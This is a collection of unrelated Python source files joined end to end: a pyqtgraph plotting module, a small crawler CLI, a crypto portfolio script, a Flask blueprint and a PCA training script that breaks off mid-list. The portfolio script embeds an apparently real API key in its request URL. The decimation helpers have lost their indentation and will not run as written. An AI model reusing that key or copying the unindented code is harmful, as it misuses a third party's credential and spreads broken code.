        # The first child's viewbox drives the shared x axis.
        return self.children[0].viewbox

    def _default_x_axis(self):
        x_axis = pg.AxisItem('bottom')
        x_axis.setGrid(64)
        x_axis.linkToView(self.children[0].viewbox)
        return x_axis

    def update(self, event=None):
        pass

    def find(self, name):
        # Return the child with the given name, or None when absent.
        for child in self.children:
            if child.name == name:
                return child

    def format_container(self):
        pass

    def _reset_plots(self):
        pass
class PlotContainer(BasePlotContainer):
    """Container with a fixed x range; (0, 0) means "leave autoscaled"."""

    x_min = d_(Float(0))
    x_max = d_(Float(0))

    def format_container(self):
        # If we want to specify values relative to a psi context variable, we
        # cannot do it when initializing the plots.
        if (self.x_min != 0) or (self.x_max != 0):
            self.base_viewbox.setXRange(self.x_min, self.x_max, padding=0)

    def update(self, event=None):
        deferred_call(self.format_container)
class BaseTimeContainer(BasePlotContainer):
    '''
    Contains one or more viewboxes that share the same time-based X-axis
    '''
    data_range = Typed(BaseDataRange)
    span = d_(Float(1))
    delay = d_(Float(0.25))

    def _default_container(self):
        container = super()._default_container()
        # Ensure that the x axis shows the planned range
        self.base_viewbox.setXRange(0, self.span, padding=0)
        # Follow the data range as it scrolls.
        self.data_range.observe('current_range', self.update)
        return container

    def _default_x_axis(self):
        x_axis = super()._default_x_axis()
        x_axis.setLabel('Time', unitPrefix='sec.')
        return x_axis

    def update(self, event=None):
        low, high = self.data_range.current_range
        deferred_call(self.base_viewbox.setXRange, low, high, padding=0)
        super().update()
class TimeContainer(BaseTimeContainer):
    """Time container driven by continuously-acquired channel data."""

    def _default_data_range(self):
        return ChannelDataRange(container=self, span=self.span,
                                delay=self.delay)

    def update(self, event=None):
        # Propagate the update to every child viewbox first.
        for child in self.children:
            child.update()
        super().update()
class EpochTimeContainer(BaseTimeContainer):
    """Time container whose span tracks the longest epoch seen."""

    def _default_data_range(self):
        return EpochDataRange(container=self, span=self.span, delay=self.delay)
def format_log_ticks(values, scale, spacing):
    """Tick formatter for a log-scaled axis: map log10 tick values back to
    linear values with one decimal place.

    *scale* and *spacing* are unused but required by the pyqtgraph
    ``AxisItem.logTickStrings`` signature.
    """
    # BUG FIX: the np.float alias was removed in NumPy 1.24 (AttributeError);
    # use the builtin float dtype instead.
    values = 10**np.array(values).astype(float)
    return ['{:.1f}'.format(v) for v in values]
class FFTContainer(BasePlotContainer):
    '''
    Contains one or more viewboxes that share the same frequency-based X-axis
    '''
    # Frequency bounds (Hz) for the visible range.
    freq_lb = d_(Float(5))
    freq_ub = d_(Float(50000))

    def _default_container(self):
        container = super()._default_container()
        # The x axis works in log10(frequency) coordinates.
        self.base_viewbox.setXRange(np.log10(self.freq_lb),
                                    np.log10(self.freq_ub),
                                    padding=0)
        return container

    def _default_x_axis(self):
        x_axis = super()._default_x_axis()
        x_axis.setLabel('Frequency (Hz)')
        # Show linear frequencies on the log-scaled axis.
        x_axis.logTickStrings = format_log_ticks
        x_axis.setLogMode(True)
        return x_axis
################################################################################
# ViewBox
################################################################################
class ViewBox(PSIContribution):
    """A y-axis + viewbox row inside a plot container."""

    viewbox = Typed(pg.ViewBox)
    y_axis = Typed(pg.AxisItem)

    y_mode = d_(Enum('symmetric', 'upper'))
    # A (0, 0) pair means "autoscale"; anything else pins the y range.
    y_min = d_(Float(0))
    y_max = d_(Float(0))

    allow_zoom_y = d_(Bool(True))
    allow_zoom_x = d_(Bool(False))

    data_range = Property()

    def _default_name(self):
        return self.label

    def _get_data_range(self):
        # The data range is owned by the parent container.
        return self.parent.data_range

    def _default_y_axis(self):
        y_axis = pg.AxisItem('left')
        y_axis.setLabel(self.label)
        y_axis.linkToView(self.viewbox)
        y_axis.setGrid(64)
        return y_axis

    def _default_viewbox(self):
        viewbox = pg.ViewBox(enableMenu=False)
        viewbox.setMouseEnabled(x=False, y=True)
        viewbox.setBackgroundColor('w')

        if (self.y_min != 0) or (self.y_max != 0):
            viewbox.disableAutoRange()
            viewbox.setYRange(self.y_min, self.y_max)

        for child in self.children:
            for plot in child.get_plots():
                viewbox.addItem(plot)
        return viewbox

    def update(self, event=None):
        for child in self.children:
            child.update()

    def add_plot(self, plot, label=None):
        self.viewbox.addItem(plot)
        if label:
            self.parent.legend.addItem(plot, label)

    def plot(self, x, y, color='k', log_x=False, log_y=False, label=None,
             kind='line'):
        '''
        Convenience function used by plugins

        This is typically used in post-processing routines to add static plots
        to existing view boxes.
        '''
        if log_x:
            x = np.log10(x)
        if log_y:
            y = np.log10(y)
        x = np.asarray(x)
        y = np.asarray(y)

        # Drop non-finite points (NaN, log10 of zero/negatives) before plotting.
        m = np.isfinite(x) & np.isfinite(y)
        x = x[m]
        y = y[m]

        if kind == 'line':
            item = pg.PlotCurveItem(pen=pg.mkPen(color))
        elif kind == 'scatter':
            item = pg.ScatterPlotItem(pen=pg.mkPen(color))
        else:
            # BUG FIX: an unknown kind used to fall through and raise a
            # confusing NameError on `item`; fail fast with a clear message.
            raise ValueError('Unsupported plot kind %r' % (kind,))
        item.setData(x, y)
        self.add_plot(item)

        if label is not None:
            self.parent.legend.addItem(item, label)
################################################################################
# Plots
################################################################################
class BasePlot(PSIContribution):
    """Base class for plots bound to a named data source contribution."""

    # Make this weak-referenceable so we can bind methods to Qt slots.
    __slots__ = '__weakref__'

    source_name = d_(Unicode())
    source = Typed(object)
    label = d_(Unicode())

    def update(self, event=None):
        pass

    def _reset_plots(self):
        pass
################################################################################
# Single plots
################################################################################
class SinglePlot(BasePlot):
    """A plot contribution that draws exactly one pyqtgraph item."""

    pen_color = d_(Typed(object))
    pen_width = d_(Float(0))
    antialias = d_(Bool(False))
    label = d_(Unicode())

    pen = Typed(object)   # pg pen built from pen_color/pen_width
    plot = Typed(object)  # the single pyqtgraph item

    def get_plots(self):
        return [self.plot]

    def _default_pen_color(self):
        return 'black'

    def _default_pen(self):
        color = make_color(self.pen_color)
        return pg.mkPen(color, width=self.pen_width)

    def _default_name(self):
        return self.source_name + '_plot'
class ChannelPlot(SinglePlot):
    """
    Continuously plots a single channel, decimating the signal to roughly
    on-screen pixel resolution before drawing.
    """
    downsample = Int(0)                  # samples folded into one pixel pair
    decimate_mode = d_(Enum('extremes', 'mean'))

    _cached_time = Typed(np.ndarray)     # precomputed time axis for the span
    _buffer = Typed(SignalBuffer)        # rolling buffer of recent samples

    def _default_name(self):
        return self.source_name + '_channel_plot'

    def _default_plot(self):
        return pg.PlotCurveItem(pen=self.pen, antialias=self.antialias)

    def _observe_source(self, event):
        # Wire this plot into the data pipeline once a source is assigned.
        if self.source is not None:
            self.parent.data_range.add_source(self.source)
            self.parent.data_range.observe('span', self._update_time)
            self.source.add_callback(self._append_data)
            # Recompute decimation whenever the viewbox is resized.
            self.parent.viewbox.sigResized.connect(self._update_decimation)
            self._update_time(None)
            self._update_decimation(self.parent.viewbox)

    def _update_time(self, event):
        # Precompute the time array since this can be the "slow" point
        # sometimes in computations
        n = round(self.parent.data_range.span*self.source.fs)
        self._cached_time = np.arange(n)/self.source.fs
        self._update_decimation()
        self._update_buffer()

    def _update_buffer(self, event=None):
        # Buffer twice the visible span so redraws have data on hand.
        self._buffer = SignalBuffer(self.source.fs,
                                    self.parent.data_range.span*2)

    def _update_decimation(self, viewbox=None):
        try:
            # One decimation chunk per pair of horizontal pixels.
            width, _ = self.parent.viewbox.viewPixelSize()
            dt = self.source.fs**-1
            self.downsample = round(width/dt/2)
        except Exception as e:
            # Viewbox may not be laid out yet; keep the previous value.
            pass

    def _append_data(self, data):
        self._buffer.append_data(data)
        self.update()

    def update(self, event=None):
        low, high = self.parent.data_range.current_range
        data = self._buffer.get_range_filled(low, high, np.nan)
        t = self._cached_time[:len(data)] + low
        if self.downsample > 1:
            t = t[::self.downsample]
            if self.decimate_mode == 'extremes':
                # Draw each chunk as a vertical min->max segment ('pairs').
                d_min, d_max = decimate_extremes(data, self.downsample)
                t = t[:len(d_min)]
                x = np.c_[t, t].ravel()
                y = np.c_[d_min, d_max].ravel()
                if x.shape == y.shape:
                    deferred_call(self.plot.setData, x, y, connect='pairs')
            elif self.decimate_mode == 'mean':
                d = decimate_mean(data, self.downsample)
                t = t[:len(d)]
                if t.shape == d.shape:
                    deferred_call(self.plot.setData, t, d)
        else:
            # No decimation needed; plot raw samples.
            t = t[:len(data)]
            deferred_call(self.plot.setData, t, data)
def _reshape_for_decimate(data, downsample):
# Determine the "fragment" size that we are unable to decimate. A
# downsampling factor of 5 means that we perform the operation in chunks of
# 5 samples. If we have only 13 samples of data, then we cannot decimate
# the last 3 samples and will simply discard them.
last_dim = data.ndim
offset = data.shape[-1] % downsample
if offset > 0:
data = data[..., :-offset]
shape = (len(data), -1, downsample) if data.ndim == 2 else (-1, downsample)
return data.reshape(shape)
def decimate_mean(data, downsample):
# If data is empty, return imediately
if data.size == 0:
return np.array([]), np.array([])
data = _reshape_for_decimate(data, downsample).copy()
return data.mean(axis=-1)
def decimate_extremes(data, downsample):
# If data is empty, return imediately
if data.size == 0:
return np.array([]), np.array([])
# Force a copy to be made, which speeds up min()/max(). Apparently min/max
# make a copy of a reshaped array before performing the operation, so we
# force it now so the copy only occurs once.
data = _reshape_for_decimate(data, downsample).copy()
return data.min(axis=-1), data.max(axis=-1)
class FFTChannelPlot(ChannelPlot):
    """Plots the running spectrum (as SPL) of the latest `time_span` seconds."""

    time_span = d_(Float(1))                  # analysis window, seconds
    window = d_(Enum('hamming', 'flattop'))   # taper applied before the FFT

    _x = Typed(np.ndarray)                    # cached frequency axis
    _buffer = Typed(SignalBuffer)

    def _default_name(self):
        return self.source_name + '_fft_plot'

    def _observe_source(self, event):
        if self.source is not None:
            self.source.add_callback(self._append_data)
            # Frequency axis depends on the sampling rate.
            self.source.observe('fs', self._cache_x)
            self._update_buffer()
            self._cache_x()

    def _update_buffer(self, event=None):
        self._buffer = SignalBuffer(self.source.fs, self.time_span)

    def _append_data(self, data):
        self._buffer.append_data(data)
        self.update()

    def _cache_x(self, event=None):
        if self.source.fs:
            self._x = get_x_fft(self.source.fs, self.time_span)

    def update(self, event=None):
        # Wait until a full analysis window has been acquired.
        if self._buffer.get_time_ub() >= self.time_span:
            data = self._buffer.get_latest(-self.time_span, 0)
            #psd = util.patodb(util.psd(data, self.source.fs, self.window))
            psd = util.psd(data, self.source.fs, self.window)
            # Convert power spectral density to SPL via the calibration.
            spl = self.source.calibration.get_spl(self._x, psd)
            deferred_call(self.plot.setData, self._x, spl)
class BaseTimeseriesPlot(SinglePlot):
    """
    Draws epochs (pairs of rising/falling timestamps) as filled rectangles
    on a timeline.
    """
    rect_center = d_(Float(0.5))   # vertical center of the rectangles
    rect_height = d_(Float(1))     # vertical extent of the rectangles

    fill_color = d_(Typed(object))
    brush = Typed(object)

    _rising = Typed(list, ())      # onset timestamps
    _falling = Typed(list, ())     # offset timestamps

    def _default_brush(self):
        return pg.mkBrush(self.fill_color)

    def _default_plot(self):
        plot = pg.QtGui.QGraphicsPathItem()
        plot.setPen(self.pen)
        plot.setBrush(self.brush)
        return plot

    def update(self, event=None):
        lb, ub = self.parent.data_range.current_range
        current_time = self.parent.data_range.current_time

        starts = self._rising
        ends = self._falling
        # Pair starts with ends, synthesizing the missing boundary for
        # epochs that began before time 0 or have not yet ended.
        if len(starts) == 0 and len(ends) == 1:
            starts = [0]
        elif len(starts) == 1 and len(ends) == 0:
            ends = [current_time]
        elif len(starts) > 0 and len(ends) > 0:
            if starts[0] > ends[0]:
                starts = np.r_[0, starts]
            if starts[-1] > ends[-1]:
                ends = np.r_[ends, current_time]

        try:
            epochs = np.c_[starts, ends]
        except ValueError as e:
            # Mismatched starts/ends (e.g., mid-acquisition race); skip this
            # redraw rather than crash.
            log.exception(e)
            log.warning('Unable to update %r, starts shape %r, ends shape %r',
                        self, starts, ends)
            return

        # Keep epochs intersecting the visible range (NaN bounds pass too).
        m = ((epochs >= lb) & (epochs < ub)) | np.isnan(epochs)
        epochs = epochs[m.any(axis=-1)]

        path = pg.QtGui.QPainterPath()
        y_start = self.rect_center - self.rect_height*0.5
        for x_start, x_end in epochs:
            x_width = x_end-x_start
            r = pg.QtCore.QRectF(x_start, y_start, x_width, self.rect_height)
            path.addRect(r)
        deferred_call(self.plot.setPath, path)
class EventPlot(BaseTimeseriesPlot):
    """Timeseries plot fed by explicit start/end event notifications."""

    event = d_(Unicode())   # name of the event this plot tracks

    def _observe_event(self, event):
        # NOTE(review): `self.event` is a Unicode member, so it is never
        # None; this check effectively always subscribes — confirm whether
        # a truthiness check was intended.
        if self.event is not None:
            self.parent.data_range.observe('current_time', self.update)

    def _default_name(self):
        return self.event + '_timeseries'

    def _append_data(self, bound, timestamp):
        if bound == 'start':
            self._rising.append(timestamp)
        elif bound == 'end':
            self._falling.append(timestamp)
        self.update()
class TimeseriesPlot(BaseTimeseriesPlot):
    """Timeseries plot fed by an event source's rising/falling edges."""

    source_name = d_(Unicode())
    source = Typed(object)

    def _default_name(self):
        return self.source_name + '_timeseries'

    def _observe_source(self, event):
        if self.source is not None:
            self.parent.data_range.add_event_source(self.source)
            self.parent.data_range.observe('current_time', self.update)
            self.source.add_callback(self._append_data)

    def _append_data(self, data):
        # Data arrives as (edge_type, timestamp) pairs.
        for (etype, value) in data:
            if etype == 'rising':
                self._rising.append(value)
            elif etype == 'falling':
                self._falling.append(value)
################################################################################
# Group plots
################################################################################
class GroupMixin(ColorCycleMixin):
    """
    Mixin for plots that maintain one curve per group of acquired data,
    lazily creating a plot item per group key.
    """
    source = Typed(object)
    group_meta = d_(Unicode())
    groups = d_(Typed(ContextMeta))
    group_names = d_(List())

    #: Function that takes the epoch metadata and decides whether to accept it
    #: for plotting. Useful to reduce the number of plots shown on a graph.
    group_filter = d_(Callable())

    #: Function that takes the epoch metadata and returns a key indicating
    #: which group it should be included in for plotting.
    group_color_key = d_(Callable())

    pen_width = d_(Int(0))
    antialias = d_(Bool(False))

    plots = Dict()

    # Internal bookkeeping, all keyed by group key.
    _data_cache = Typed(object)
    _data_count = Typed(object)
    _data_updated = Typed(object)
    _data_n_samples = Typed(object)

    _pen_color_cycle = Typed(object)
    _plot_colors = Typed(object)
    _x = Typed(np.ndarray)

    #: Redraw only after this many new items have accumulated per group.
    n_update = d_(Int(1))

    def _default_group_names(self):
        return [p.name for p in self.groups.values]

    def _default_group_filter(self):
        # Accept everything by default.
        return lambda key: True

    def _default_group_color_key(self):
        return lambda key: tuple(key[g] for g in self.group_names)

    def get_pen_color(self, key):
        kw_key = {n: k for n, k in zip(self.group_names, key)}
        group_key = self.group_color_key(kw_key)
        return super().get_pen_color(group_key)

    def reset_plots(self):
        # Clear any existing plots and reset color cycle.
        # BUGFIX: iterate over the plot items themselves; the old code
        # iterated `.items()` and passed (key, plot) tuples to removeItem.
        for plot in self.plots.values():
            self.parent.viewbox.removeItem(plot)
        self.plots = {}
        self._data_cache = defaultdict(list)
        self._data_count = defaultdict(int)
        self._data_updated = defaultdict(int)
        self._data_n_samples = defaultdict(int)

    def _observe_groups(self, event):
        self.groups.observe('values', self._update_groups)
        self._update_groups()

    def _update_groups(self, event=None):
        self.reset_plots()
        self.group_names = [p.name for p in self.groups.values]
        if self.source is not None:
            self.update()

    def get_plots(self):
        return []

    def _make_new_plot(self, key):
        log.info('Adding plot for key %r', key)
        try:
            pen_color = self.get_pen_color(key)
            pen = pg.mkPen(pen_color, width=self.pen_width)
            plot = pg.PlotCurveItem(pen=pen, antialias=self.antialias)
            deferred_call(self.parent.viewbox.addItem, plot)
            self.plots[key] = plot
        except KeyError as key_error:
            key = key_error.args[0]
            m = f'Cannot update plot since a field, {key}, ' \
                'required by the plot is missing.'
            raise ConfigurationException(m) from key_error

    def get_plot(self, key):
        # Lazily create a plot item the first time a group key is seen.
        if key not in self.plots:
            self._make_new_plot(key)
        return self.plots[key]
class EpochGroupMixin(GroupMixin):
    """Accumulates epochs per group and redraws averaged traces lazily."""

    duration = Float()   # duration (s) derived from the longest epoch seen

    def _y(self, epoch):
        # Average the accumulated epochs; all-NaN trace when group is empty.
        return np.mean(epoch, axis=0) if len(epoch) \
            else np.full_like(self._x, np.nan)

    def _update_duration(self, event=None):
        self.duration = self.source.duration

    def _epochs_acquired(self, epochs):
        for d in epochs:
            md = d['info']['metadata']
            if self.group_filter(md):
                signal = d['signal']
                key = tuple(md[n] for n in self.group_names)
                self._data_cache[key].append(signal)
                self._data_count[key] += 1

                # Track number of samples
                n = max(self._data_n_samples[key], len(signal))
                self._data_n_samples[key] = n

        # Does at least one epoch need to be updated?
        for key, count in self._data_count.items():
            if count >= self._data_updated[key] + self.n_update:
                n = max(self._data_n_samples.values())
                self.duration = n / self.source.fs
                self.update()
                break

    def _observe_source(self, event):
        if self.source is not None:
            self.source.add_callback(self._epochs_acquired)
            self.source.observe('duration', self._update_duration)
            self.source.observe('fs', self._cache_x)
            self.observe('duration', self._cache_x)
            self._reset_plots()
            self._cache_x()

    def update(self, event=None):
        # Update epochs that need updating
        todo = []
        for key, count in list(self._data_count.items()):
            if count >= self._data_updated[key] + self.n_update:
                data = self._data_cache[key]
                plot = self.get_plot(key)
                y = self._y(data)
                todo.append((plot.setData, self._x, y))
                self._data_updated[key] = len(data)

        # Apply all setData calls in one deferred batch on the GUI thread.
        def update():
            for setter, x, y in todo:
                setter(x, y)
        deferred_call(update)
class GroupedEpochAveragePlot(EpochGroupMixin, BasePlot):
    """Plots the time-domain average of each epoch group."""

    def _cache_x(self, event=None):
        # Set up the new time axis
        if self.source.fs and self.duration:
            n_time = round(self.source.fs * self.duration)
            self._x = np.arange(n_time)/self.source.fs

    def _default_name(self):
        return self.source_name + '_grouped_epoch_average_plot'

    def _observe_source(self, event):
        super()._observe_source(event)
        if self.source is not None:
            self.parent.data_range.add_source(self.source)
class GroupedEpochFFTPlot(EpochGroupMixin, BasePlot):
    """Plots each epoch group's average spectrum as SPL."""

    def _default_name(self):
        return self.source_name + '_grouped_epoch_fft_plot'

    def _cache_x(self, event=None):
        # Cache the frequency points. Must be in units of log for PyQtGraph.
        # TODO: This could be a utility function stored in the parent?
        if self.source.fs and self.duration:
            self._x = get_x_fft(self.source.fs, self.duration)

    def _y(self, epoch):
        # Average in the time domain, then convert the PSD to SPL.
        y = np.mean(epoch, axis=0) if epoch else np.full_like(self._x, np.nan)
        return self.source.calibration.get_spl(self._x, util.psd(y, self.source.fs))
class GroupedEpochPhasePlot(EpochGroupMixin, BasePlot):
    """Plots each epoch group's average phase spectrum."""

    unwrap = d_(Bool(True))   # unwrap phase to avoid 2*pi discontinuities

    def _default_name(self):
        return self.source_name + '_grouped_epoch_phase_plot'

    def _cache_x(self, event=None):
        # Cache the frequency points. Must be in units of log for PyQtGraph.
        # TODO: This could be a utility function stored in the parent?
        if self.source.fs and self.duration:
            self._x = get_x_fft(self.source.fs, self.duration)

    def _y(self, epoch):
        y = np.mean(epoch, axis=0) if epoch else np.full_like(self._x, np.nan)
        return util.phase(y, self.source.fs, unwrap=self.unwrap)
class StackedEpochAveragePlot(EpochGroupMixin, BasePlot):
    """
    Plots one average waveform per group, vertically offset so the traces
    are stacked rather than overlaid.
    """
    _offset_update_needed = Bool(False)

    def _make_new_plot(self, key):
        super()._make_new_plot(key)
        # Defer offset recalculation until the next update.
        self._offset_update_needed = True

    def _update_offsets(self, vb=None):
        vb = self.parent.viewbox
        height = vb.height()
        n = len(self.plots)
        # Distribute the plots evenly across the viewbox height.
        for i, (_, plot) in enumerate(sorted(self.plots.items())):
            offset = (i+1) * height / (n+1)
            point = vb.mapToView(pg.Point(0, offset))
            plot.setPos(0, point.y())

    def _cache_x(self, event=None):
        # Set up the new time axis
        if self.source.fs and self.source.duration:
            n_time = round(self.source.fs * self.source.duration)
            self._x = np.arange(n_time)/self.source.fs

    def update(self, event=None):
        # BUGFIX: accept the `event` argument so observer callbacks that
        # pass a change event (per the BasePlot.update signature) still work.
        super().update()
        if self._offset_update_needed:
            deferred_call(self._update_offsets)
            self._offset_update_needed = False

    def _reset_plots(self):
        #super()._reset_plots()
        # Keep the offsets in sync with any range change.
        self.parent.viewbox \
            .sigRangeChanged.connect(self._update_offsets)
        self.parent.viewbox \
            .sigRangeChangedManually.connect(self._update_offsets)
################################################################################
# Simple plotters
################################################################################
class ResultPlot(SinglePlot):
    """
    Scatter/line plot of (x_column, y_column) pairs pulled from a result
    source, optionally averaging y values that share the same x.
    """
    x_column = d_(Unicode())
    y_column = d_(Unicode())
    average = d_(Bool())

    # Maps the user-facing symbol name to the pyqtgraph symbol code.
    SYMBOL_MAP = {
        'circle': 'o',
        'square': 's',
        'triangle': 't',
        'diamond': 'd',
    }
    symbol = d_(Enum('circle', 'square', 'triangle', 'diamond'))
    symbol_size = d_(Float(10))
    symbol_size_unit = d_(Enum('screen', 'data'))

    data_filter = d_(Callable())

    _data_cache = Typed(list)   # accumulated (x, y) pairs

    def _default_data_filter(self):
        # By default, accept all data points
        return lambda x: True

    def _default_name(self):
        return '.'.join((self.parent.name, self.source_name, 'result_plot',
                         self.x_column, self.y_column))

    def _observe_source(self, event):
        if self.source is not None:
            self._data_cache = []
            self.source.add_callback(self._data_acquired)

    def _data_acquired(self, data):
        # Accumulate accepted points; redraw only if something was added.
        update = False
        for d in data:
            if self.data_filter(d):
                x = d[self.x_column]
                y = d[self.y_column]
                self._data_cache.append((x, y))
                update = True
        if update:
            self.update()

    def update(self, event=None):
        if not self._data_cache:
            return
        x, y = zip(*self._data_cache)
        x = np.array(x)
        y = np.array(y)
        if self.average:
            # Collapse repeated x values to the mean of their y values.
            d = pd.DataFrame({'x': x, 'y': y}).groupby('x')['y'].mean()
            x = d.index.values
            y = d.values
        deferred_call(self.plot.setData, x, y)

    def _default_plot(self):
        symbol_code = self.SYMBOL_MAP[self.symbol]
        color = QColor(self.pen_color)
        pen = pg.mkPen(color, width=self.pen_width)
        brush = pg.mkBrush(color)
        plot = pg.PlotDataItem(pen=pen,
                               antialias=self.antialias,
                               symbol=symbol_code,
                               symbolSize=self.symbol_size,
                               symbolPen=pen,
                               symbolBrush=brush,
                               pxMode=self.symbol_size_unit=='screen')
        deferred_call(self.parent.add_plot, plot, self.label)
        return plot
class DataFramePlot(ColorCycleMixin, PSIContribution):
    """
    Plots (x_column, y_column) from a DataFrame, one curve per unique value
    of the `grouping` columns. Plot items are cached per group key.
    """
    data = d_(Typed(pd.DataFrame))
    x_column = d_(Unicode())
    y_column = d_(Unicode())
    grouping = d_(List(Unicode()))

    _plot_cache = Dict()   # group key (or None) -> plot item

    # Maps the user-facing symbol name to the pyqtgraph symbol code.
    SYMBOL_MAP = {
        'circle': 'o',
        'square': 's',
        'triangle': 't',
        'diamond': 'd',
    }
    symbol = d_(Enum('circle', 'square', 'triangle', 'diamond'))
    symbol_size = d_(Float(10))
    symbol_size_unit = d_(Enum('screen', 'data'))

    pen_width = d_(Float(0))
    antialias = d_(Bool(False))

    def _default_name(self):
        return '.'.join((self.parent.name, 'result_plot'))

    # Changing any plot parameter invalidates the cached plot items.
    def _observe_x_column(self, event):
        self.reset_plots()
        self._observe_data(event)

    def _observe_y_column(self, event):
        self.reset_plots()
        self._observe_data(event)

    def _observe_grouping(self, event):
        self.reset_plots()
        self._observe_data(event)

    def _observe_data(self, event):
        # Redraw everything; no-op until data and both columns are present.
        if self.data is None:
            return
        if self.x_column not in self.data:
            return
        if self.y_column not in self.data:
            return

        todo = []
        if self.grouping:
            try:
                for group, values in self.data.groupby(self.grouping):
                    if group not in self._plot_cache:
                        self._plot_cache[group] = self._default_plot(group)
                    x = values[self.x_column].values
                    y = values[self.y_column].values
                    # Sort by x so line plots don't zig-zag.
                    i = np.argsort(x)
                    todo.append((self._plot_cache[group], x[i], y[i]))
            except KeyError as e:
                # This is likely triggered when grouping updates an analysis
                # before it's ready.
                log.warning(e)
                return
        else:
            # No grouping: a single plot item cached under None.
            if None not in self._plot_cache:
                self._plot_cache[None] = self._default_plot(None)
            x = self.data[self.x_column].values
            y = self.data[self.y_column].values
            i = np.argsort(x)
            todo.append((self._plot_cache[None], x[i], y[i]))

        # Apply all setData calls in one deferred batch on the GUI thread.
        def update():
            nonlocal todo
            for plot, x, y in todo:
                plot.setData(x, y)
        deferred_call(update)

    def _default_plot(self, group):
        symbol_code = self.SYMBOL_MAP[self.symbol]
        color = self.get_pen_color(group)
        brush = pg.mkBrush(color)
        pen = pg.mkPen(color, width=self.pen_width)
        plot = pg.PlotDataItem(pen=pen,
                               antialias=self.antialias,
                               symbol=symbol_code,
                               symbolSize=self.symbol_size,
                               symbolPen=pen,
                               symbolBrush=brush,
                               pxMode=self.symbol_size_unit=='screen')
        deferred_call(self.parent.add_plot, plot, self.label)
        return plot

    def reset_plots(self):
        # Remove cached plot items from the viewbox and start fresh.
        for plot in self._plot_cache.values():
            deferred_call(self.parent.viewbox.removeItem, plot)
        self._plot_cache = {}

    def get_plots(self):
        return list(self._plot_cache.values())
|
#!/usr/bin/env python
import click
from lib.python.stream_crawler.stream_crawler import StreamCrawler
class BloodhoundCLI:
    """
    Namespace for the click CLI entry points.

    NOTE(review): the click group/command are declared inside a class body
    without `self`; click wraps them into plain command objects, so this
    class acts purely as a namespace — confirm this is intentional.
    """

    @click.group()
    def bloodhound_cli():
        pass

    @bloodhound_cli.command()
    @click.option('--site', type=click.Choice(['youtube', 'twitch']), required=True)
    def crawl(site):
        # Dispatch to the crawler for the selected site.
        StreamCrawler.run(site)
|
import requests
import json
# SECURITY NOTE(review): the CoinMarketCap API key is hard-coded into this
# URL; it should be loaded from an environment variable or config instead,
# and the committed key should be revoked.
api_request = requests.get("https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit=5&convert=USD&CMC_PRO_API_KEY=3889ce63-c733-403d-8b7d-c41a2438b4ea")
api = json.loads(api_request.content)

print("----------------")
print("----------------")

# Portfolio holdings: symbol, quantity owned, and purchase price per coin.
coins = [
    {
        "symbol":"BTC",
        "amount_owned": 2,
        "price_per_coin": 3200
    },
    {
        "symbol":"EOS",
        "amount_owned": 100,
        "price_per_coin": 2.05
    }
]

total_pl = 0   # running profit/loss across the whole portfolio

# Walk the top-5 listing and report profit/loss for each coin we hold.
for i in range(0, 5):
    for coin in coins:
        if api["data"][i]["symbol"] == coin["symbol"]:
            total_paid = coin["amount_owned"] * coin["price_per_coin"]
            current_value = coin["amount_owned"] * api["data"][i]["quote"]["USD"]["price"]
            pl_percoin = api["data"][i]["quote"]["USD"]["price"] - coin["price_per_coin"]
            total_pl_coin = pl_percoin * coin["amount_owned"]
            total_pl = total_pl + total_pl_coin
            print(api["data"][i]["name"] + " - " + api["data"][i]["symbol"])
            print("Price - ${0:.2f}".format(api["data"][i]["quote"]["USD"]["price"]))
            print("Number Of Coin:", coin["amount_owned"])
            print("Total Amount Paid:", "${0:.2f}".format(total_paid))
            print("Current Value:", "${0:.2f}".format(current_value))
            print("P/L Per Coin:", "${0:.2f}".format(pl_percoin))
            print("Total P/L With Coin:", "${0:.2f}".format(total_pl_coin))
            print("----------------")

print("Total P/L For Portfolio:", "${0:.2f}".format(total_pl))
|
import math
a,b=raw_input().split()
x=float(a)
y=float(b)
print round(math.sqrt(x*x+y*y),1)
print round(x*y/2,1)
|
from flask import Blueprint

# Blueprint collecting all /courses endpoints.
courses = Blueprint('courses',__name__,url_prefix='/courses')

# Imported after the blueprint is defined — presumably because
# app.courses.routes needs `courses` (avoids a circular import); confirm.
from app.courses import routes
import time

start = time.time()

# Print the message ten times, pausing two seconds between prints.
for _ in range(10):
    print("This is sandy program")
    time.sleep(2)

# Report the total elapsed time for the loop above.
print("while loop execution time: ", time.time() - start, "Seconds")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 13:54:26 2020
@author: petrapoklukar
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import app
from absl import flags
import sys
sys.path.append('..')
from disentanglement_lib.preprocessing import preprocess
from disentanglement_lib.methods.unsupervised import pca
FLAGS = flags.FLAGS

# Command-line flags shared by every entry point in this script.
flags.DEFINE_string("dataset", None, "dataset to use")
flags.DEFINE_boolean("overwrite", False,
                     "Whether to overwrite output directory.")
flags.DEFINE_integer("rng", 0,
                     "random seed")
def main_per_model(unused_argv):
    """Split the dataset for one random seed, train PCA, then delete splits."""
    base_path = "backbone"
    model_path = os.path.join(base_path, "pca")
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    # Step 1: create seed-specific train/validation splits.
    print("\n\n*- Preprocessing '%s' \n\n" %(FLAGS.dataset))
    preproces_gin_bindings = [
        "dataset.name = '%s'" %(FLAGS.dataset),
        "preprocess.preprocess_fn = @split_train_and_validation",
        "split_train_and_validation.random_seed = %d" %(FLAGS.rng)
    ]
    preprocess.preprocess_with_gin(FLAGS.dataset,
                                   "dummy_name",
                                   overwrite=FLAGS.overwrite,
                                   gin_config_files=None,
                                   gin_bindings=preproces_gin_bindings)
    print("\n\n*- Preprocessing DONE \n\n")

    # Step 2: train PCA on the seed-specific split.
    print("\n\n*- Training PCA.")
    gin_bindings = [
        "dataset.name = '%s'" %(FLAGS.dataset + '_' + str(FLAGS.rng)),
        "train_pca.random_seed = 0",
        "train_pca.num_pca_components = [10, 30]",#[100, 500, 1000, 2000, 4000]",
    ]
    pca.train_pca_with_gin(
        model_path, FLAGS.overwrite, gin_bindings=gin_bindings)

    # Step 3: remove the temporary splits created in step 1.
    preprocess.destroy_train_and_validation_splits(
        FLAGS.dataset + '_' + str(FLAGS.rng))
    print("\n\n*- Training COMPLETED \n\n")
def main_per_dataset(unused_argv):
    """Train PCA directly on the full dataset (no per-seed splitting)."""
    base_path = "backbone"
    model_path = os.path.join(base_path, "pca")
    if not os.path.exists(model_path):
        os.makedirs(model_path)

    print("\n\n*- Training PCA.")
    gin_bindings = [
